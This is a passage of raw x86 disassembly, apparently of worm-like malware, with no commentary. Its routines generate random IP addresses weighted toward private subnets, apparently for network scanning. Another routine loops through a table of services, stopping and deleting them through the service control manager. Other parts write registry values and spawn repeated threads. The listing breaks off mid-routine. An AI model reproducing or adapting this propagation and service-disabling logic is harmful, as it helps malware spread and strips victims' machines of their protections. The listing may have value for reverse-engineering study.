call sub_43F909
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-134h], dl
call sub_43F909
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-131h], dl
call sub_43F909
mov ecx, 0FDh
cdq
idiv ecx
mov edi, edx
inc edi
mov edx, edi
mov [ebp-132h], dl
call sub_43F909
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-133h], dl
mov al, [ebp-133h]
cmp al, 5
jnb short loc_43EF09
mov al, [ebp-112h]
mov [ebp-134h], al
mov al, [ebp-133h]
cmp al, 3
jnb short loc_43EF09
mov al, [ebp-135h]
mov [ebp-131h], al
loc_43EF09: ; CODE XREF: .data:0043EEE5�j
; .data:0043EEFB�j
cmp byte ptr [ebp-111h], 0Ah
jnz short loc_43EF3E
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
movzx eax, byte ptr [ebp-134h]
push eax
push offset sub_404D49
lea eax, [ebp-130h]
push eax
call sub_43F921
add esp, 14h
loc_43EF3E: ; CODE XREF: .data:0043EF10�j
movzx eax, byte ptr [ebp-111h]
cmp eax, 0ACh
jnz short loc_43EF98
mov al, [ebp-112h]
cmp al, 0Fh
jbe short loc_43EF98
cmp al, 21h
jnb short loc_43EF98
call sub_43F909
movzx edi, byte ptr [ebp-132h]
push edi
movzx edi, byte ptr [ebp-131h]
push edi
mov edx, eax
and edx, 8000000Fh
jge short loc_43EF7E
dec edx
or edx, 0FFFFFFF0h
inc edx
loc_43EF7E: ; CODE XREF: .data:0043EF77�j
mov edi, edx
add edi, 10h
push edi
push offset sub_404D3C
lea edi, [ebp-130h]
push edi
call sub_43F921
add esp, 14h
loc_43EF98: ; CODE XREF: .data:0043EF4A�j
; .data:0043EF54�j ...
movzx eax, byte ptr [ebp-111h]
cmp eax, 0C0h
jnz short loc_43EFD8
movzx eax, byte ptr [ebp-112h]
cmp eax, 0A8h
jnz short loc_43EFD8
movzx eax, byte ptr [ebp-132h]
push eax
movzx eax, byte ptr [ebp-131h]
push eax
push 404D2Eh
lea eax, [ebp-130h]
push eax
call sub_43F921
add esp, 10h
loc_43EFD8: ; CODE XREF: .data:0043EFA4�j
; .data:0043EFB2�j
lea eax, [ebp-130h]
push eax
call sub_43F5AD
cmp [ebp-10Ch], eax
jz loc_43EE16
push dword ptr [ebp-10Ch]
call sub_43F5B9
movzx edi, word ptr ds:loc_404094
push edi
push eax
push 404D27h
lea edi, [ebp-0FFh]
push edi
call sub_43F921
add esp, 10h
loc_43F018: ; CODE XREF: .data:0043F041�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_43F021: ; CODE XREF: .data:0043F026�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F021
cmp eax, 19h
jz short loc_43F043
push 404D25h
lea eax, [ebp-0FFh]
push eax
call sub_43F939
add esp, 8
jmp short loc_43F018
; ---------------------------------------------------------------------------
loc_43F043: ; CODE XREF: .data:0043F02B�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_43F04C: ; CODE XREF: .data:0043F051�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F04C
push eax
lea edi, [ebp-0FFh]
push edi
mov edi, ebx
add edi, 9
push edi
call sub_43F8E5
add esp, 0Ch
lea eax, [ebp-130h]
push eax
call sub_43F5AD
push esi
push ebx
push eax
call sub_43E741
add esp, 0Ch
mov [ebp-13Ch], eax
push 0
call sub_43F8CD
add esp, 4
jmp loc_43EE16
; ---------------------------------------------------------------------------
db 5Fh, 5Eh, 5Bh
dd 4C2C9h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F09C proc near ; CODE XREF: .data:0043F0DE�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
call sub_43F71D
cmp eax, 80000000h
jb short loc_43F0B3
mov eax, 3Ch
jmp short locret_43F0D4
; ---------------------------------------------------------------------------
loc_43F0B3: ; CODE XREF: sub_43F09C+E�j
push 0
lea eax, [ebp+var_4]
push eax
call sub_43F601
and [ebp+var_4], 2
cmp [ebp+var_4], 2
jnz short loc_43F0CF
mov eax, 12Ch
jmp short locret_43F0D4
; ---------------------------------------------------------------------------
loc_43F0CF: ; CODE XREF: sub_43F09C+2A�j
mov eax, 64h
locret_43F0D4: ; CODE XREF: sub_43F09C+15�j
; sub_43F09C+31�j
leave
retn
sub_43F09C endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
call sub_43F09C
mov ebx, eax
lea eax, [ebp-4]
push eax
push 0
push 0
push offset sub_401565
push 0
push 0
call sub_43F7AD
push eax
call sub_43F705
xor esi, esi
jmp short loc_43F137
; ---------------------------------------------------------------------------
loc_43F105: ; CODE XREF: .data:0043F139�j
lea eax, [ebp-4]
push eax
push 0
push 0
push 401E23h
push 0
push 0
call sub_43F7AD
push eax
call sub_43F705
mov eax, 0EA60h
xor edx, edx
div ebx
mov [ebp-8], eax
mov edi, eax
push eax
call sub_43F8CD
pop ecx
inc esi
loc_43F137: ; CODE XREF: .data:0043F103�j
cmp esi, ebx
jb short loc_43F105
pop edi
pop esi
pop ebx
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F142 proc near ; CODE XREF: sub_43F411+AC�p
var_388 = dword ptr -388h
var_384 = dword ptr -384h
var_380 = dword ptr -380h
var_37C = dword ptr -37Ch
var_378 = dword ptr -378h
var_374 = dword ptr -374h
var_370 = dword ptr -370h
var_36C = byte ptr -36Ch
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_164 = dword ptr -164h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 388h
push ebx
push esi
push edi
lea edi, [ebp+var_16C]
lea esi, loc_404A36+2
mov ecx, 51h
rep movsd
and [ebp+var_24], 0
loc_43F165: ; CODE XREF: sub_43F142+211�j
push 0F003Fh
push 0
push 0
call sub_43F855
mov [ebp+var_28], eax
or eax, eax
jz loc_43F34C
push 0F003Fh
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_370], eax
push [ebp+eax+var_16C]
push [ebp+var_28]
call sub_43F861
mov ebx, eax
or eax, eax
jz loc_43F344
lea eax, [ebp+var_20]
push eax
push 1
push ebx
call sub_43F83D
mov [ebp+var_4], eax
and [ebp+var_4], 0
loc_43F1BD: ; CODE XREF: sub_43F142+A4�j
lea eax, [ebp+var_20]
push eax
push 4
push ebx
call sub_43F83D
or eax, eax
jz short loc_43F1D3
cmp [ebp+var_1C], 1
jnz short loc_43F1D5
loc_43F1D3: ; CODE XREF: sub_43F142+89�j
jmp short loc_43F1E8
; ---------------------------------------------------------------------------
loc_43F1D5: ; CODE XREF: sub_43F142+8F�j
push 3E8h
call sub_43F789
inc [ebp+var_4]
cmp [ebp+var_4], 0Ah
jb short loc_43F1BD
loc_43F1E8: ; CODE XREF: sub_43F142:loc_43F1D3�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_374], eax
cmp [ebp+eax+var_168], 0
jz short loc_43F206
push ebx
call sub_43F849
loc_43F206: ; CODE XREF: sub_43F142+BC�j
push ebx
call sub_43F831
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_378], eax
cmp [ebp+eax+var_164], 0
jz loc_43F344
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_37C], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 0
jnz loc_43F2CC
push 0
push 18h
lea eax, [ebp+var_36C]
push eax
push 0
call sub_43F60D
or eax, eax
jz short loc_43F2CC
lea ecx, [ebp+var_36C]
or eax, 0FFFFFFFFh
loc_43F265: ; CODE XREF: sub_43F142+128�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43F265
mov [ebp+var_4], eax
cmp [ebp+var_4], 1
jbe short loc_43F299
mov eax, [ebp+var_4]
sub eax, 1
cmp [ebp+eax+var_36C], 5Ch
jz short loc_43F299
push offset sub_404BA0
lea eax, [ebp+var_36C]
push eax
call sub_43F939
add esp, 8
loc_43F299: ; CODE XREF: sub_43F142+131�j
; sub_43F142+141�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
lea eax, [ebp+var_36C]
push eax
call sub_43F939
add esp, 8
lea eax, [ebp+var_36C]
push eax
call sub_43F7B9
loc_43F2CC: ; CODE XREF: sub_43F142+FE�j
; sub_43F142+118�j
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_380], eax
mov eax, [ebp+eax+var_164]
cmp byte ptr [eax], 1
jnz short loc_43F344
lea eax, [ebp+var_4]
push eax
push 20006h
push 0
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_384], eax
mov edx, [ebp+eax+var_164]
push dword ptr [edx+4]
mov eax, [ebp+eax+var_164]
push dword ptr [eax+0Ch]
call sub_43F891
or eax, eax
jnz short loc_43F344
mov eax, 0Ch
mul [ebp+var_24]
mov [ebp+var_388], eax
mov eax, [ebp+eax+var_164]
push dword ptr [eax+8]
push [ebp+var_4]
call sub_43F86D
push [ebp+var_4]
call sub_43F885
loc_43F344: ; CODE XREF: sub_43F142+62�j
; sub_43F142+E0�j ...
push [ebp+var_28]
call sub_43F831
loc_43F34C: ; CODE XREF: sub_43F142+36�j
inc [ebp+var_24]
cmp [ebp+var_24], 1Bh
jb loc_43F165
pop edi
pop esi
pop ebx
leave
retn 4
sub_43F142 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 10h
push edi
mov eax, [ebp+0Ch]
cmp eax, 10h
jz short loc_43F3EE
jg short loc_43F37B
cmp eax, 2
jz short loc_43F3E5
jmp loc_43F3FB
; ---------------------------------------------------------------------------
loc_43F37B: ; CODE XREF: .data:0043F36F�j
cmp eax, 113h
jnz short loc_43F3FB
and dword ptr [ebp-4], 0
mov dword ptr [ebp-8], 4
lea eax, [ebp-10h]
push eax
lea eax, [ebp-8]
push eax
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E380
mov eax, dword ptr ds:loc_404096+2
mov [ebp-0Ch], eax
add [ebp-4], eax
push 4
push 4
lea eax, [ebp-4]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E315
add esp, 30h
push 0
push 404098h
call sub_43F735
jmp short loc_43F40C
; ---------------------------------------------------------------------------
loc_43F3E5: ; CODE XREF: .data:0043F374�j
push 0
call sub_43F801
jmp short loc_43F40C
; ---------------------------------------------------------------------------
loc_43F3EE: ; CODE XREF: .data:0043F36D�j
push dword ptr ds:loc_403000
call sub_43F819
jmp short loc_43F40C
; ---------------------------------------------------------------------------
loc_43F3FB: ; CODE XREF: .data:0043F376�j
; .data:0043F380�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call sub_43F825
loc_43F40C: ; CODE XREF: .data:0043F3E3�j
; .data:0043F3EC�j ...
pop edi
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F411 proc near ; CODE XREF: sub_43F619+5C�p
var_2DC = byte ptr -2DCh
var_2D8 = byte ptr -2D8h
var_148 = dword ptr -148h
var_143 = byte ptr -143h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 2DCh
push edi
mov edi, [ebp+arg_0]
push [ebp+arg_8]
push offset sub_403010
call sub_43F69D
push 404B7Ch
lea eax, [ebp+var_143]
push eax
call sub_43F921
and [ebp+var_44], 0
lea eax, loc_4023A3+4
mov [ebp+var_40], eax
and [ebp+var_3C], 0
and [ebp+var_38], 0
mov [ebp+var_34], edi
and [ebp+var_30], 0
and [ebp+var_2C], 0
and [ebp+var_28], 0
and [ebp+var_24], 0
lea eax, [ebp+var_143]
mov [ebp+var_20], eax
lea eax, [ebp+var_44]
push eax
call sub_43F7D1
push 0
push edi
push 0
push 0
push 0
push 0
push 0
push 0
push 0CF0000h
push 404D25h
lea eax, [ebp+var_143]
push eax
push 0
call sub_43F80D
mov dword ptr ds:loc_403000, eax
call sub_43F6E1
push eax
call sub_43E2F0
lea eax, [ebp+var_2D8]
push eax
push 2
call sub_43F54D
push 0
call sub_43F142
lea eax, [ebp+var_2DC]
push eax
push 0
push 0
push 40211Dh
push 0
push 0
call sub_43F7AD
push eax
call sub_43F705
and [ebp+var_148], 0
push 4
push 4
lea eax, [ebp+var_148]
push eax
push 404B81h
push offset sub_404B85
push 80000001h
call sub_43E315
add esp, 24h
push 0
push 2710h
push 1
push dword ptr ds:loc_403000
call sub_43F7C5
jmp short loc_43F532
; ---------------------------------------------------------------------------
loc_43F520: ; CODE XREF: sub_43F411+132�j
lea eax, [ebp+var_1C]
push eax
call sub_43F7E9
lea eax, [ebp+var_1C]
push eax
call sub_43F7F5
loc_43F532: ; CODE XREF: sub_43F411+10D�j
push 0
push 0
push 0
lea eax, [ebp+var_1C]
push eax
call sub_43F7DD
or eax, eax
jnz short loc_43F520
pop edi
leave
retn 10h
sub_43F411 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F54D proc near ; CODE XREF: sub_43F411+A5�p
jmp dword ptr ds:loc_40524A+2
sub_43F54D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F559 proc near ; CODE XREF: .data:0043E617�p
jmp dword ptr ds:loc_40524E+2
sub_43F559 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F565 proc near ; CODE XREF: .data:0043E5E4�p
jmp dword ptr ds:loc_405254
sub_43F565 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F571 proc near ; CODE XREF: .data:0043E512�p
; sub_43E741+651�p
jmp dword ptr ds:loc_405254+4
sub_43F571 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F57D proc near ; CODE XREF: sub_43E741+1BA�p
jmp dword ptr ds:loc_40525A+2
sub_43F57D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F589 proc near ; CODE XREF: sub_43EDA2+20�p
jmp dword ptr ds:loc_40525F+1
sub_43F589 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F595 proc near ; CODE XREF: sub_43EDA2+E�p
jmp dword ptr ds:loc_405264
sub_43F595 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5A1 proc near ; CODE XREF: .data:0043E5D2�p
; sub_43E741+197�p
jmp dword ptr ds:loc_405264+4
sub_43F5A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5AD proc near ; CODE XREF: .data:0043EFDF�p
; .data:0043F070�p
jmp dword ptr ds:loc_405269+3
sub_43F5AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5B9 proc near ; CODE XREF: sub_43E741+63�p
; .data:0043EFF6�p
jmp dword ptr ds:loc_40526F+1
sub_43F5B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5C5 proc near ; CODE XREF: .data:0043E602�p
jmp dword ptr ds:loc_405271+3
sub_43F5C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5D1 proc near ; CODE XREF: .data:0043E3F2�p
; sub_43E741+20B�p ...
jmp dword ptr ds:loc_405278
sub_43F5D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5DD proc near ; CODE XREF: .data:0043E444�p
; .data:0043E480�p ...
jmp dword ptr ds:loc_40527C
sub_43F5DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5E9 proc near ; CODE XREF: .data:0043E50A�p
; sub_43E741+649�p
jmp dword ptr ds:loc_40527C+4
sub_43F5E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F5F5 proc near ; CODE XREF: .data:0043E59B�p
; sub_43E741+48�p
jmp dword ptr ds:loc_405281+3
sub_43F5F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F601 proc near ; CODE XREF: sub_43F09C+1D�p
jmp dword ptr ds:loc_40528D+3
sub_43F601 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F60D proc near ; CODE XREF: sub_43F142+111�p
jmp dword ptr ds:loc_40529C
sub_43F60D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43F619 proc near ; CODE XREF: .data:0043E238�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push edi
call sub_43F6D5
mov edi, eax
cmp byte ptr [edi], 22h
jnz short loc_43F64D
push 22h
mov eax, edi
inc eax
push eax
call sub_43F945
add esp, 8
mov [ebp+var_4], eax
or eax, eax
jz short loc_43F668
mov edi, eax
inc edi
jmp short loc_43F645
; ---------------------------------------------------------------------------
loc_43F644: ; CODE XREF: sub_43F619+2F�j
inc edi
loc_43F645: ; CODE XREF: sub_43F619+29�j
cmp byte ptr [edi], 20h
jz short loc_43F644
jmp short loc_43F668
; ---------------------------------------------------------------------------
loc_43F64C: ; CODE XREF: sub_43F619+3E�j
inc edi
loc_43F64D: ; CODE XREF: sub_43F619+F�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_43F659
cmp eax, 20h
jnz short loc_43F64C
loc_43F659: ; CODE XREF: sub_43F619+39�j
jmp short loc_43F65C
; ---------------------------------------------------------------------------
loc_43F65B: ; CODE XREF: sub_43F619+4D�j
inc edi
loc_43F65C: ; CODE XREF: sub_43F619:loc_43F659�j
movsx eax, byte ptr [edi]
or eax, eax
jz short loc_43F668
cmp eax, 20h
jz short loc_43F65B
loc_43F668: ; CODE XREF: sub_43F619+24�j
; sub_43F619+31�j ...
push 0
call sub_43F6F9
push 1
push edi
push 0
push eax
call sub_43F411
pop edi
leave
retn
sub_43F619 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_43F67D proc near ; CODE XREF: sub_43E741+8�p
var_FFC = dword ptr -0FFCh
pop ecx
loc_43F67E: ; CODE XREF: sub_43F67D+14�j
sub esp, 1000h
sub eax, 1000h
test [esp+0FFCh+var_FFC], eax
cmp eax, 1000h
jnb short loc_43F67E
sub esp, eax
test [esp+0FFCh+var_FFC], eax
jmp ecx
sub_43F67D endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
sub_43F69D proc near ; CODE XREF: sub_43F411+15�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
xor eax, eax
mov ecx, 0FFFFFFFFh
xchg edi, edx
repne scasb
neg ecx
lea ecx, [ecx-1]
mov eax, [esp+arg_4]
xchg eax, esi
mov edi, [esp+arg_0]
rep movsb
xchg eax, esi
xchg edx, edi
mov eax, [esp+arg_0]
retn 8
sub_43F69D endp
; ---------------------------------------------------------------------------
align 4
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6C9 proc near ; CODE XREF: .data:0043E558�p
jmp dword ptr ds:loc_4052A5+3
sub_43F6C9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6D5 proc near ; CODE XREF: sub_43F619+5�p
jmp dword ptr ds:loc_4052A9+3
sub_43F6D5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6E1 proc near ; CODE XREF: sub_43F411+91�p
jmp dword ptr ds:loc_4052AF+1
sub_43F6E1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6ED proc near ; CODE XREF: .data:0043E560�p
jmp dword ptr ds:loc_4052B4
sub_43F6ED endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F6F9 proc near ; CODE XREF: sub_43F619+51�p
jmp dword ptr ds:loc_4052B4+4
sub_43F6F9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F705 proc near ; CODE XREF: .data:0043E590�p
; .data:0043E634�p ...
jmp dword ptr ds:loc_4052B9+3
sub_43F705 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F711 proc near ; CODE XREF: .data:0043EDE8�p
jmp dword ptr ds:loc_4052BE+2
sub_43F711 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F71D proc near ; CODE XREF: sub_43F09C+4�p
jmp dword ptr ds:loc_4052C1+3
sub_43F71D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F729 proc near ; CODE XREF: sub_43E2F0+1E�p
jmp dword ptr ds:loc_4052C6+2
sub_43F729 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F735 proc near ; CODE XREF: .data:0043E52E�p
; .data:0043F3DE�p
jmp dword ptr ds:locret_4052CC
sub_43F735 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F741 proc near ; CODE XREF: .data:0043E4D2�p
jmp dword ptr ds:loc_4052CF+1
sub_43F741 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F74D proc near ; CODE XREF: .data:0043E56D�p
; .data:0043EE00�p
jmp dword ptr ds:loc_4052D4
sub_43F74D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F759 proc near ; CODE XREF: .data:0043E54A�p
jmp dword ptr ds:loc_4052D8
sub_43F759 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F765 proc near ; CODE XREF: .data:0043E58A�p
jmp dword ptr ds:loc_4052DB+1
sub_43F765 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F771 proc near ; CODE XREF: sub_43E033+13�p
jmp dword ptr ds:loc_4052E0
sub_43F771 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F77D proc near ; CODE XREF: .data:0043E5A8�p
; sub_43E741+17E�p
jmp dword ptr ds:loc_4052E0+4
sub_43F77D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F789 proc near ; CODE XREF: .data:0043E4C6�p
; .data:0043E500�p ...
jmp dword ptr ds:loc_4052E8
sub_43F789 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F795 proc near ; CODE XREF: sub_43E741+72�p
jmp dword ptr ds:loc_4052E8+4
sub_43F795 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7A1 proc near ; CODE XREF: sub_43E741+BB�p
; sub_43E741+D9�p ...
jmp dword ptr ds:loc_4052F0
sub_43F7A1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7AD proc near ; CODE XREF: .data:0043E62E�p
; .data:0043F0F6�p ...
jmp dword ptr ds:loc_4052F0+4
sub_43F7AD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7B9 proc near ; CODE XREF: sub_43F142+185�p
jmp dword ptr ds:loc_4052F7+1
sub_43F7B9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7C5 proc near ; CODE XREF: sub_43F411+108�p
jmp dword ptr ds:loc_405302+2
sub_43F7C5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7D1 proc near ; CODE XREF: sub_43F411+60�p
jmp dword ptr ds:loc_405302+6
sub_43F7D1 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7DD proc near ; CODE XREF: sub_43F411+12B�p
jmp dword ptr ds:loc_40530C
sub_43F7DD endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7E9 proc near ; CODE XREF: sub_43F411+113�p
jmp dword ptr ds:loc_40530C+4
sub_43F7E9 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F7F5 proc near ; CODE XREF: sub_43F411+11C�p
jmp dword ptr ds:loc_405314
sub_43F7F5 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F801 proc near ; CODE XREF: .data:0043F3E7�p
jmp dword ptr ds:loc_405317+1
sub_43F801 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F80D proc near ; CODE XREF: sub_43F411+87�p
jmp dword ptr ds:loc_405319+3
sub_43F80D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F819 proc near ; CODE XREF: .data:0043F3F4�p
jmp dword ptr ds:loc_405320
sub_43F819 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F825 proc near ; CODE XREF: .data:0043F407�p
jmp dword ptr ds:loc_405320+4
sub_43F825 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F831 proc near ; CODE XREF: sub_43F142+C5�p
; sub_43F142+205�p
jmp dword ptr ds:loc_405330
sub_43F831 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F83D proc near ; CODE XREF: sub_43F142+6F�p
; sub_43F142+82�p
jmp dword ptr ds:loc_405330+4
sub_43F83D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F849 proc near ; CODE XREF: sub_43F142+BF�p
jmp dword ptr ds:loc_405337+1
sub_43F849 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F855 proc near ; CODE XREF: sub_43F142+2C�p
jmp dword ptr ds:loc_40533C
sub_43F855 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F861 proc near ; CODE XREF: sub_43F142+59�p
jmp dword ptr ds:loc_405340
sub_43F861 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F86D proc near ; CODE XREF: sub_43F142+1F5�p
jmp dword ptr ds:loc_405340+4
sub_43F86D endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43F879 proc near ; CODE XREF: sub_43E315+21�p
jmp dword ptr ds:loc_405345+3
sub_43F879 endp
; ---------------------------------------------------------------------------
db 90h
dd 90h
db 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
